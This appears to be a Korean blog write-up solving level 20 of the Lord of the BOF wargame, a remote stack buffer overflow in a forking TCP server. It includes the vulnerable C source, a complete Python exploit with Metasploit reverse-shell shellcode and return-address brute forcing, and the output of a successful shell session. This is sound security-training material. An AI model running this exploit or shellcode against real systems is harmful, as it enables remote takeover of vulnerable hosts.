

BOB과제로 FTZ풀다가 급생각나서 LOB도 풀어보는데 재미있다.


레벨 20에서는 remote exploit이 등장하는데 먼저 소스코드를 보면


[xavius@localhost xavius]$ cat death_knight.c

/*

The Lord of the BOF : The Fellowship of the BOF

- dark knight

- remote BOF

*/


#include

#include

#include

#include

#include

#include

#include

#include

#include


/*
 * LOB level 20 target ("death_knight"): a forking TCP server on port 6666.
 * Each connection gets a banner, then ONE recv() of up to 256 bytes into a
 * 40-byte stack buffer -- the overflow this level is built around.  The
 * #include lines above lost their header names in this copy; the calls used
 * here need the usual stdio/stdlib/string/unistd/sys/socket/netinet/sys/wait
 * headers.  Pre-C99 style: implicit int return type, no return statement.
 */
main()

{

/* 40-byte stack buffer; recv() below is allowed to write 256 bytes into it. */
char buffer[40];


int server_fd, client_fd;

struct sockaddr_in server_addr;

struct sockaddr_in client_addr;

/* accept() wants a socklen_t*; int happens to match on 32-bit targets. */
int sin_size;


if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){

perror("socket");

exit(1);

}


server_addr.sin_family = AF_INET;

server_addr.sin_port = htons(6666);

/* Listens on every interface -- reachable from any host that can route here. */
server_addr.sin_addr.s_addr = INADDR_ANY;

bzero(&(server_addr.sin_zero), 8);


if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){

perror("bind");

exit(1);

}


if(listen(server_fd, 10) == -1){

perror("listen");

exit(1);

}


/* Accept loop: one child per connection, so a crashed child (e.g. a failed
 * exploit attempt) does not take the service down -- which is what makes
 * brute-forcing the return address from a client practical. */
while(1) {

sin_size = sizeof(struct sockaddr_in);

if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){

perror("accept");

continue;

}


/* Child path (fork() == 0).  A failed fork() (-1) is not checked and is
 * treated like the parent path. */
if (!fork()){

/* 52 and 6 are the exact lengths of the two literals. */
send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);

send(client_fd, "You : ", 6, 0);

/* VULNERABLE (intended for this level): length 256 > sizeof(buffer) == 40.
 * A client can write 216 bytes past the end of buffer, over main()'s saved
 * frame pointer and return address on the expected frame layout.  The
 * return value is also ignored.  A fixed server would pass
 * sizeof(buffer) - 1 and check the result. */
recv(client_fd, buffer, 256, 0);

close(client_fd);

/* Child leaves the loop, closes the listening socket and returns from main. */
break;

}


/* Parent: drop its copy of the client socket and reap finished children
 * without blocking. */
close(client_fd);

while(waitpid(-1,NULL,WNOHANG) > 0);

}

close(server_fd);

/* In the child, returning here pops the saved return address that the
 * oversized recv() may have overwritten -- this is where the client's
 * payload takes control. */
}



buffer는 40바이트인데 recv()가 최대 256바이트를 받아서 쓰기 때문에 BOF가 발생한다. buffer는 main()의 지역변수이므로 넘친 바이트가 sfp와 main()의 ret를 덮고, 자식 프로세스가 recv() 뒤에 루프를 break하고 main()에서 리턴하는 순간 덮어쓴 주소로 점프한다.


스택의 구조를


[data...]| [buffer][sfp][ret] |[data...]


으로 예상하고 exploit을 작성했다


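"""LOB level 20 (death_knight) -- remote stack overflow exploit.

The target is a forking TCP server on port 6666 that does
``recv(client_fd, buffer, 256, 0)`` into a 40-byte stack buffer in main().
We send a 255-byte string laid out as

    [40 bytes: buffer][4: saved ebp][4: return address][NOP slide][shellcode]

and brute-force the two low bytes of the return address inside 0xbfffXXXX,
the stack region of the LOB VM (this only works where the stack is at a
fixed address, i.e. no stack randomisation).  The server forks per
connection, so a wrong guess only kills a child and we can simply try the
next address.

The shellcode is a *reverse* shell, so this script cannot see success:
run a listener first, watch it, and stop the script once a shell connects.
The address printed with each attempt tells you which guess worked.

NOTE: the blog's HTML stripped the ``+`` operators and the ``"<L"`` format
string from the original Python 2 listing; this is the restored script,
written for Python 3 (bytes payload).
"""
import socket
import struct

# linux/x86/shell_reverse_tcp - 95 bytes
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LHOST=*, LPORT=*
# NOTE: LHOST/LPORT are baked into these bytes -- regenerate the shellcode
# (msfvenom -p linux/x86/shell_reverse_tcp) for your own listener before use.
SHELLCODE = (
    b"\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8"
    b"\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80"
    b"\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01"
    b"\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16"
    b"\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f"
    b"\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0"
    b"\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66"
)

HOST = "192.168.0.29"  # death_knight server
PORT = 6666
LIMIT = 256 - 1        # the server recv()s 256 bytes; stay one byte short

BUFFER_SIZE = 40       # char buffer[40] in death_knight.c
SFP_SIZE = 4           # saved frame pointer (ebp)
RET_SIZE = 4           # saved return address, 32-bit
NOP = b"\x90"

# Return-address search grid for 0xbfff<high><low>.  With a 95-byte
# shellcode the NOP slide is 255 - 48 - 95 = 112 bytes, and consecutive
# candidates are at most 100 bytes apart (0, 100, 200, then 0 of the next
# high byte is 56 further), so at least one candidate lands inside the slide
# for whatever address the buffer actually has.  That is why a step of 100
# is enough and a step >= 112 would not be.
RET_HIGH_BYTES = range(0xFF, 0x00, -1)  # 0xff .. 0x01, high addresses first
RET_LOW_BYTES = range(0, 0xFF, 100)     # 0, 100, 200


def p32(value):
    """Pack *value* as a 32-bit little-endian unsigned integer (x86 order)."""
    return struct.pack("<L", value)


def candidate_returns():
    """Yield return-address guesses in the original search order.

    Addresses are 0xbfff_hh_ll with hh descending from 0xff to 0x01 and
    ll in (0, 100, 200) -- 765 guesses in total.
    """
    for high in RET_HIGH_BYTES:
        for low in RET_LOW_BYTES:
            yield 0xBFFF0000 | (high << 8) | low


def build_payload(ret_addr, shellcode=SHELLCODE, limit=LIMIT):
    """Return the *limit*-byte overflow string for one return-address guess.

    Layout: 40 NOPs fill ``buffer``, 4 NOPs overwrite the saved frame
    pointer (its value does not matter once we control eip), ``ret_addr``
    overwrites main()'s return address, then a NOP slide pads the payload so
    that ``shellcode`` ends exactly at byte *limit*.

    Raises ValueError if ``shellcode`` does not fit -- the original silently
    produced an empty slide in that case.
    """
    head = NOP * BUFFER_SIZE + NOP * SFP_SIZE + p32(ret_addr)
    slide_len = limit - len(head) - len(shellcode)
    if slide_len < 0:
        raise ValueError("shellcode too long for a %d-byte payload" % limit)
    return head + NOP * slide_len + shellcode


def send_payload(host, port, payload, timeout=5.0):
    """Connect to the server, drain its banner and send *payload* once.

    The socket is closed on exit; OSError from connect/recv/send propagates
    so that an unreachable target stops the run instead of looping forever.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.recv(1024)  # "Death Knight : ..." banner and the "You : " prompt
        sock.sendall(payload)


def main():
    """Fire one payload per candidate return address against HOST:PORT."""
    print(len(SHELLCODE))
    print("[*] Sending Exploit Codes..")
    for ret_addr in candidate_returns():
        send_payload(HOST, PORT, build_payload(ret_addr))
        # Correlate this line with the moment your listener gets a shell.
        print("PWNED? ret=0x%08x" % ret_addr)


if __name__ == "__main__":
    main()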


* 쉘코드는 metasploit(linux/x86/shell_reverse_tcp, shikata_ga_nai 인코딩)으로 만든 리버스쉘이다. LHOST/LPORT가 쉘코드 바이트에 고정되어 있으므로 자신의 리스너 주소로 다시 생성해야 하고, exploit을 돌리기 전에 nc 리스너를 먼저 띄워 두어야 한다. 스크립트는 성공 여부를 알 수 없으므로 리스너에 접속이 들어오면 수동으로 멈춘다.


J:\fedora_exploit\TheLordOfTheBOF_redhat>lob20.py

[*] Sending Exploit Codes..

pwned?


C:\Users\sweetchip\Desktop>nc -lvp *

listening on [any] * ...

192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA

connect to [192.168.0.2] from (UNKNOWN) [192.168.0.1] 1045: NO_DATA

id

uid=0(root) gid=0(root) euid=520(death_knight) egid=520(death_knight)

my-pass

euid = 520

g** *** ****


[death_knight@localhost death_knight]$ cat dropped_item.txt

You're so great! This is a token to the next gate.

,.
,' `.
,' _<>_ `.
,'.-'____`-.`.
,'_.-'' ``-._`.
,',' /\ `.`.
,' /.._ O / \ O _.,\ `.
,'/ / \ ``-;.--.:-'' / \ \`.
,' : : \ /\`.,'/\ / : : `.
< <>| | O >(< ( ) >)< O | |<> >
`. : : / \/,'`.\/ \ ; ; ,'
`.\ \ /_..-:`--';-.._\ / /,'
`. \`' O \ / O `'/ ,'
`.`._ \/ _,','
`..``-.____.-'',,'
`.`-.____.-','
`. <> ,'
`. ,'
`'


Exploit에 성공해 쉘을 획득했다. id 출력을 보면 uid=0(root)이지만 euid=520(death_knight)이므로 실질적인 권한은 death_knight이고, 그래서 my-pass도 euid 520 기준으로 death_knight의 패스워드를 보여 준다.


